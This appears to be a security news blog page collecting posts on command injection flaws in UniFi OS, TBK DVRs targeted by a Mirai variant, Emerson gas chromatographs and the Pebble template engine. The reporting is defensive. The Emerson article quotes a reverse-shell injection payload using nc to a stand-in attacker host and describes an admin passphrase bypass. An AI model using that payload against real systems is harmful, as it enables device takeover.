Search This Blog

Popular Posts

Powered by Blogger.

Blog Archive

Labels

Footer About

Footer About

Labels

Showing posts with label Command Injection. Show all posts

Ubiquiti UniFi OS Flaw Under Active Exploitation CISA Alerts Users


 

A new focus on network infrastructure devices has been drawn after the U.S. Cybersecurity and Infrastructure Security Agency (CISA) flagged several security vulnerabilities in Ubiquiti's UniFi OS platform. Following evidence of active exploitation, the KEV catalog was updated to include these vulnerabilities. 

Among the identified vulnerabilities are access control bypass, path traversal, and command injection vulnerabilities, which researchers warn can provide attackers with direct access from unauthenticated access to a complete system compromise. With UniFi OS widely deployed across enterprise, government, and service provider environments to manage networking equipment, the vulnerabilities present a significant threat to administrative control planes and sensitive operational information. 

In the latest CISA alert, researchers have demonstrated that Internet-exposed management interfaces present an increased threat, as researchers have demonstrated how these flaws may be chained together to facilitate privileged remote code execution. In response, federal agencies and organizations are urging them to expedite remediation efforts before further exploitation activity occurs. 

Inclusions of the KEVs are based on three distinct vulnerabilities that affect UniFi OS, when combined, significantly increases the attack surface of exposed deployments. In this vulnerability, unauthenticated actors have the capability to alter system settings and administrative configurations without authorization as a result of an access control bypass weakness. 

The CVE-2026-4909 vulnerability exposes a path traversal condition that is capable of exposing underlying operating system files, potentially revealing credentials, configuration data, and other sensitive information that can be used to carry out further intrusions. As a result of an improper input validation attack, CVE-2026-34910 can be exploited to execute arbitrary operating system commands on targeted devices. 

All three vulnerabilities were addressed by Ubiquiti through security updates released in May, noting that exploiting the vulnerabilities does not require prior authorization or elevated privileges, making timely patch deployment critical for organizations using UniFi infrastructure. 

Following the analysis, Bishop Fox security researchers have demonstrated that these vulnerabilities are not isolated risks but can be chained together to permit remote code execution on affected systems using privileged privileges. Using their findings, attackers were able to gain complete control over vulnerable UniFi OS instances by gaining initial unauthorized access, demonstrating how severe this vulnerability is in real-world environments. 

Additionally, the researchers published a detection utility to assist defenders in identifying and remediating vulnerable deployments across enterprise networks on GitHub. In conjunction with the CISA alert, active exploitation concerns have also been raised regarding CVE-2025-67038, a critical root-level command injection vulnerability on Lantronix EDS5000 servers using firmware version 2.1.0.0R3 of Lantronix servers. 

Shell commands are invoked as part of the mechanism used to record failed authentication attempts within the device's HTTP RPC component, where the flaw occurs. During the process of handling user input, improper handling could lead to command injection, making it possible for attackers to execute arbitrary commands with root privileges on the affected system. 

By adding the UniFi OS flaws to CISA's Known Exploited Vulnerabilities catalog, the vulnerabilities fall under the remediation requirements of Binding Operational Directive 22-01. According to this directive, federal civilian agencies are required to remediate actively exploited vulnerabilities within prescribed timelines in order to reduce operational risk. 

A response has been provided by CISA, which has ordered that agencies rectify CVE-2026-34908, CVE-2026-34909, and CVE-2026-34910 by June 26, 2026, while also recommending that organizations in the private sector evaluate their environments against the KEV catalog and prioritize exposed systems that could be exploited in ongoing attacks. However, reports emerging from community forums and Reddit discussions suggest that threat actors may have weaponized the vulnerabilities before they were disclosed, even though Ubiquiti's security advisories did not explicitly refer to active exploitation. 

Researchers believe that rogue accounts were unexpectedly created by administrators using the username “John Sim,” a process researchers believe might have been linked to automated reconnaissance operations targeting unattended UniFi deployments that were accessible via the internet. 

The Bishop Fox team conducted a technical analysis of CVE-2026-34908 and CVE-2026-34909 and determined that they could be used as part of an authentication gateway bypass resulting from inconsistencies in the way NGINX interprets specially crafted requests. Through the submission of requests that appear to target authentication-exempt routes, but which normalize into protected internal endpoints, attackers may be able to access backend services normally required to log in. 

Research indicates that the bypass can be exploited to trigger CVE-2026-34910, a command injection flaw associated with improper validation of package names during update operations. The researchers validated the bypass against UniFi OS 5.0.6 test environments. 

Using shell metacharacters inserted in crafted package parameters and forcing execution through the affected code path, attackers may be able to execute operating system commands without authentication by enforcing shell metacharacters in the package parameters. This issue goes beyond individual devices. 

As outlined by the Centre for Cybersecurity Belgium, UniFi OS platforms provide visibility and control across switches, gateways, wireless networks, and connected assets, acting as central management systems for network infrastructure. By successfully compromising a system, attackers may be able to harvest credentials, manipulate network configurations, intercept traffic, or advance laterally into broader enterprise environments. 

The same urgency has also been applied to CVE-2025-67038, a critical unauthenticated command injection vulnerability affecting Lantronix EDS5000 devices with a CVSS score of 9.8. Unpatched, the flaw, which was disclosed as part of BRIDGE:BREAK research that uncovered 22 vulnerabilities across Lantronix and Silex products, allows remote command execution with root privileges, posing a comparable risk of complete device compromise. 

Among the steps CISA suggests to minimize exposure is following vendor-issued mitigation guidance, implementing an accelerated patch management procedure consistent with BOD 26-04 requirements, and maintaining sufficient logging to support forensic investigations when exploitation is suspected. 

The directive requires agencies operating cloud-hosted UniFi environments to comply with cloud-specific provisions, or to discontinue affected services if remediation cannot be completed within the specified timeframe. CISA's latest action reminds us that once vulnerabilities affecting network management platforms become publicly available, they can rapidly transform from technical flaws into high-impact security incidents. 

A critical safeguard for enterprise networks remains timely patching, exposure assessment, and continuous monitoring as threat actors continue to target infrastructure components. It is imperative for organizations relying on UniFi OS and other internet-facing management systems to take these findings seriously, ensuring that remediation efforts are paced at a rate that keeps pace with the speed at which attackers operationalize newly discovered vulnerabilities.

Mirai Botnet Variant is Building Swarm by Exploiting DVR Flaw

 

A command injection flaw in internet-connected digital video recorders used for CCTV monitoring is the target of a Mirai botnet malware variant, which allows hackers to take over the devices and add them to a botnet. 

Cybersecurity researchers at Russian cybersecurity firm Kaspersky discovered a CVE-2024-3721 exploit while analysing logs from their Linux honeypot system. The issue is a command injection vulnerability found in internet-connected digital video recorders used for CCTV surveillance. Further analysis revealed that the activity was related to a form of the Mirai botnet, which exploited this issue in TBK-manufactured DVR devices to compromise and control them. 

The vulnerability was initially discovered by security researcher "netsecfish" in April 2024. By adjusting parameters like mdb and mdc, the researcher released a proof-of-concept showing how a carefully designed post request to a specific URL can trigger shell command execution. Kaspersky confirmed that this precise technique is being utilised in the wild, with its Linux honeypots catching ongoing exploitation attempts linked to a Mirai botnet variant that uses netsecfish's proof-of-concept to compromise vulnerable DVRs. 

Nearly a decade ago, an anonymous source made the Mirai source code available online. It continues to act as the foundation for other evolving botnet efforts. The variant aimed at DVR systems expands on Mirai's initial foundation with extra features such as RC4-based string obfuscation, checks to avoid virtual machine environments, and anti-emulation methods. 

The exploit is used by the attackers to transmit a malicious ARM32 program to the target device, which then connects to a command-and-control server and joins the botnet. The infected device can be used to launch distributed denial-of-service attacks, forward malicious traffic, and engage in other malicious actions.

This Mirai variation uses a basic RC4 technique to decode its internal strings, with the decryption key disguised using XOR. After decryption, the strings are saved in a global list and used throughout runtime. To evade analysis, the virus runs anti-virtualization and anti-emulation checks on active processes for indicators of environments such as VMware or QEMU.

Last year, Netsecfish reported that around 114,000 DVR devices were vulnerable to CVE-2024-3721. Kaspersky estimates the figure to be closer to 50,000. The majority of infections associated with this Mirai variation are found in Brazil, Russia, Egypt, China, India, and Ukraine.

Critical Vulnerabilities in Emerson Gas Chromatographs Expose Sensitive Data

 

Researchers have discovered multiple critical vulnerabilities in Emerson gas chromatographs that could allow malicious actors to access sensitive data, cause denial-of-service conditions, and execute arbitrary commands. 

Gas chromatographs, essential for analyzing and separating chemical compounds, are widely used in various industries, including chemical, environmental, and healthcare sectors. The Emerson Rosemount 370XA, a popular model, uses a proprietary protocol for communication between the device and the technician's computer.

Claroty's Team82, a security research group specializing in operational technology, identified four significant vulnerabilities: two command injection flaws, an authentication bypass, and an authorization vulnerability. One of the command injection flaws received a CVSS v3 score of 9.8, marking it as critically severe.

The first vulnerability, tracked as CVE-2023-46687, is an unauthenticated remote code execution or command injection flaw found in the "forced calibration" command implementation. This flaw is tied to a system function that calls a constructed shell command with a user-provided file name without proper sanitization, allowing an attacker to inject arbitrary shell commands.

An attacker could exploit this by supplying crafted input such as gunzip -c ;nc -e /bin/sh ATTACKER_MACHINE 1337;> name_of_the_expanded_file, leading to arbitrary code execution in the root shell context.

The second vulnerability, CVE-2023-51761, is an authentication bypass that enables an attacker to bypass authentication by calculating a secret passphrase to reset the administrator password. The passphrase, derived from the device's MAC address, can be easily obtained. By understanding the passphrase validation process, an attacker can generate the passphrase using the MAC address and log in with administrator privileges using credentials formatted as EMERSON/{PASSPHRASE}.

Another flaw, CVE-2023-49716, involves a user login bypass via a password reset mechanism, allowing an unauthenticated user with network access to bypass authentication and gain admin capabilities.

The final vulnerability, CVE-2023-43609, is a command injection via reboot functionality, enabling an authenticated user with network access to execute arbitrary commands from a remote computer.

Due to the high cost and difficulty of acquiring a physical device, researchers emulated the Emerson Rosemount 370XA for their analysis. They discovered flaws in the device's protocol implementation, which allowed them to craft payloads and uncover the vulnerabilities.

The authentication bypass vulnerability, for example, allowed attackers to calculate a secret passphrase and reset administrator passwords, compromising system security.

In response to these findings, Emerson issued a security advisory recommending that users update the firmware on their devices. The Cybersecurity and Infrastructure Security Agency also released an advisory regarding these vulnerabilities.

Critical Security Bug Detected in Java Template Framework Pebble

 

The vulnerability in Pebble, a Java templating engine could allow a hacker to circumvent its security safeguards and launch command injection assaults against host servers.  

Pebble Templates is primarily used to generate HTML text output but it can also employ to design CSS, XML, JS, etc. The templates are convenient because of their user-friendly web application templating system, internationalization capabilities, and security features like auto-escaping and a block-list method access validator that thwarts command execution assaults. 

However, a threat analyst at GitHub has identified that with the right code and template files, Pebble’s command execution defense can be bypassed easily. 

Circumventing Pebble Security 

The bypassing technology can work effectively when Pebble is utilized in combination with Spring, a well-known Java application framework. Multiple Spring classes are registered as beans, allowing them to be dynamically installed at runtime. The hacker can install one of the Spring objects that supports class loading by exploiting the Java beans engine. 

Subsequently, the malicious hacker can employ Jackson, a data-parsing library, to read an XML file containing the details of a class to instantiate and a function to operate. This allows a threat actor a window to execute arbitrary code on the host server. 

As a proof of concept, the security analyst installed an XML file from the internet employing a Pebble template, then instantiated a Java class that supported implementing server-side system commands. 

No easy solution yet 

The security bug report has sparked conversation among GitHub researchers. Due to the vulnerability’s CVE designation, business systems that rely on the latest version of Pebble are receiving security alerts.

The maintainers are working on a fix, but since it is a community-driven project, it remains unclear when it will be published. The developers have issued a few temporary workarounds to safeguard projects in the interim. 

It is worth noting that to exploit the bug, an attacker would need to have a way to upload a malicious Pebble template on the server. Hence, organizations must enhance security checks on user-provided content and limit template uploads. Businesses can also employ sanitization techniques to spot and mitigate malicious content before using it in the template.